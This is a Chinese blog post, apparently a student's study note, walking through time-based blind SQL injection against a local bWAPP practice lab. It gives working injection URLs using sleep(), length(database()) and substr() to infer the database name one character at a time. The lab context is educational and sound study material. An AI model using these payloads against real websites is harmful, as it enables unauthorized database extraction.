学习web 安全笔记(第十四天)-作业,bwapp的sql注入时间盲注

最新推荐文章于 2024-07-15 23:46:30 发布
最新推荐文章于 2024-07-15 23:46:30 发布
阅读量254 收藏 1
点赞数 2
文章标签: 学习 笔记 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/huayuan1002new/article/details/138349466
版权

运用场景:没有直接返回场景。用返回的时间来判断。

原理:语句为select * from test where id ='4'

改为select * from test where id ='4' and sleep(3) -- 

and语句第一个条件为真,就会执行第二个条件。所以返回过了3秒,说明第一个条件为真。

而and语句第一个条件为假,就会立即返回。

===============================

打开bwapp环境:

bWAPP - Login

选择SQL Injection - Blind - Time-Based。

完全不显示我们选择的结果。

http://127.0.0.1/sqli_15.php?title=1&action=Search

没有任何报错,看不出来有无漏洞注入。

尝试时间盲注。

在firefox里,用f12启动hackbar,尝试:

http://127.0.0.1/sqli_15.php?title=1' or sleep(3)-- &action=search

发现有时间盲注漏洞。

http://127.0.0.1/sqli_15.php?title=World War Z' and sleep(3)-- &action=search

使用一个真正有的电影来查询。

尝试利用漏洞获取信息。分别使用3/4/5尝试,在长度等于5的时候,返回需要3秒。因此确认数据库名称长度为5.

http://127.0.0.1/sqli_15.php?title=World War Z' and length(database())=5 and sleep(3)-- &action=search

分别使用a、b尝试。在字符为b的时候,返回需要3秒。确认数据库名称第一个字符是b。

http://127.0.0.1/sqli_15.php?title=World War Z' and substr(database(),1,1)='b' and sleep(3)-- &action=search

继续尝试第二个字符......

http://127.0.0.1/sqli_15.php?title=World War Z' and substr(database(),2,1)='a' and sleep(3)-- &action=search

下一步使用程序。

huayuan1002new
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Web安全学习笔记-Web-Sec Documentation
01-30
Web安全学习笔记——Web-Sec Documentation是一份详细的知识库,旨在帮助读者理解并掌握Web安全相关的理论和技术。文档首先从Web技术的演化、网络攻防技术的发展以及网络安全观的演变三个方面进行阐述,让读者对Web...
sql注入-注入漏洞获得数据库数据-kali-sqlmap-运维安全详细笔记
06-30
SQL 注入是一种常见的 Web 应用安全漏洞,攻击者通过构造特殊的 SQL 语句来访问、修改或控制数据库中的数据。下面我们将详细介绍 SQL 注入的攻击方式、防御方法和相关工具。 一、SQL 注入攻击方式 1. 手动注入:...
安全Web安全学习笔记
02-26
这个月看了一本《Web安全设计之道》,书中的内容多是从微软官方文档翻译而来,这本书的含金量不高,不过也不能说没有收获,本文简单记录一下我学习Web安全方面的笔记。本文不涉及IIS、Windows和SqlServer的安全管理...
Web安全学习笔记-实战
04-27
Web安全学习笔记
2024Datawhale AI夏令营---基于术语词典干预的机器翻译挑战赛--学习笔记
weixin_61573157的博客
07-15 619
机器翻译(Machine Translation,简称MT)是自然语言处理领域的一个重要分支,其目标是将一种语言的文本自动转换为另一种语言的文本。机器翻译的发展可以追溯到20世纪50年代,经历了从基于规则的方法、统计方法到深度学习方法的演变过程。当前,机器翻译正朝着更加智能化和个性化方向发展。一方面,结合上下文理解、情感分析等技术,提高翻译的准确性和自然度;另一方面,通过用户反馈和个性化学习,提供更加符合用户需求的翻译服务。同时,跨语言信息检索、多模态翻译等新兴领域也正在成为研究热点。
Lumos学习王佩丰Excel第四讲:排序与选择
Sunshine_XX的博客
07-10 375
自定义排序演示:工资条拆分的演示:如果遇到很长的表,标题只存在于顶端,打印出来观感不好,可以这样做:有些版本的excel复制筛选数据容易把背后隐藏的所有数据都复制上去,这时可选中定位条件的“可见单元格”选项,复制粘贴即可。并排表示且,错排表示或。ctrl+shift+↓+→全选,演示说明:回头学原理,先记住一句话,要想筛选对,条件表头不要对。
ROS基础学习-ROS运行管理
周陽讀書
07-11 754
ROS运行管理。
NumPy库学习之np.random.rand函数
qq_46396470的博客
07-15 134
是 NumPy 库中的一个函数,用于生成随机数。这些随机数是从均匀分布 [0, 1) 中抽取的,即每个数都在0到1之间,但不包括1。
微信小程序学习使用问题总结
yuanfangderen
07-15 54
6. 如何获取多个 radio 框的值(不是表单)。可以借助bindchange 方法 加 e.target.dataset.xx, xx 类似js的name属性,然后e.detail.value 相当于js的 value。bindchange 方法 参数e, e.detail.value。如果想要获取其他属性,使用data-xx 指定,然后 e.target.dataset.xx 获取。3. 不刷新页面的情况下,清除radio选中的值。7. 使用setData 才会双向绑定 标签中的元素。
探索Perl语言:入门学习与实战指南
最新发布
洛秋的博客
07-15 598
Perl(Practical Extraction and Report Language)由Larry Wall于1987年创建,旨在帮助系统管理员简化日常任务。高效灵活:Perl的语法灵活多样,支持多种编程风格(过程式、面向对象等)。强大的文本处理能力:内置强大的正则表达式支持,是处理文本数据的利器。丰富的模块库:通过CPAN(Comprehensive Perl Archive Network)可以方便地获取和使用各类模块。Perl广泛应用于系统管理、Web开发、网络编程、数据库操作等领域。
python 语法学习 day 7
2303_79973545的博客
07-15 184
-----元组之间可以进行比较,比较的规则是逐个比较元组中的元素。首先比较第一个元素,如果相等,则比较第二个元素,以此类推。如果所有元素都相等,那么元组相等;否则,比较的结果取决于第一个不相等元素的比较结果。题意:统计单词的种类以及数量(忽略大小写),最终以降序输出(出现次数相同的单词根据单词的大小升序输出)-------掌握如何将一个英语句子中的单词拆出来,并且去掉标点符号。EOF,输入后产生异常-->>捕获异常,结束输入。第一次提交的答案是:先把所有输入值放在列表里面。------字典排序。
安卓学习中遇到的问题【bug】
小心星的博客
07-15 538
安卓学习中遇到的问题【bug】
昇思MindSpore 25天学习打卡营|day20
weixin_42036358的博客
07-13 542
生成式对抗网络(Generative Adversarial Networks,GAN)是一种生成式机器学习模型,是近年来复杂分布上无监督学习最具前景的方法之一。最初,GAN由Ian J. Goodfellow于2014年发明,并在论文生成器的任务是生成看起来像训练图像的“假”图像;判别器需要判断从生成器输出的图像是真实的训练图像还是虚假的图像。GAN通过设计生成模型和判别模型这两个模块,使其互相博弈学习产生了相当好的输出。GAN模型的核心在于提出了通过对抗过程来估计生成模型这一全新框架。
Python 学习中什么是异常处理,如何使用 try、except、finally ?
Itmastergo的博客
07-12 734
异常是程序执行过程中发生的非正常事件,这些事件会中断正常的程序指令流。当程序遇到错误时,Python 会抛出一个异常对象,异常对象包含了错误的类型和相关的信息。
Qt/QML学习-动画元素
QT、QML
07-12 1132
Qt/QML学习-动画元素
Cadence23学习笔记(三)
zjb6668的博客
07-15 242
焊接FPC的时候先上锡,焊台加热后再图上焊油,再放置元器件,再加热:万用表测电流只需要把表笔接到电流的孔位即可测量电流,不需要接再串联一个负载:有些线性电源两个通道可以串联,并联起来使用;
7.11日学习打卡----初学Redis(六)
m0_74436895的博客
07-11 1009
在现有企业中80%公司大部分使用的是Redis单机服务,在实际的场景当中单一节点的Redis容易面临风险。
WPF学习(7) --MVVM模式
Fourglsl的博客
07-15 120
WPF学习(7) --MVVM模式
WEB安全基础-合集篇
10-23
WEB安全基础-合集篇,涵盖了基础SQL注入、文件上传、XSS、CSRF、文件包含、逻辑漏洞等内容。这篇文章适合新手学习参考,通过学习这些知识可以快速了解渗透测试的基础知识。 在这篇合集中,作者首先介绍了WEB安全...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值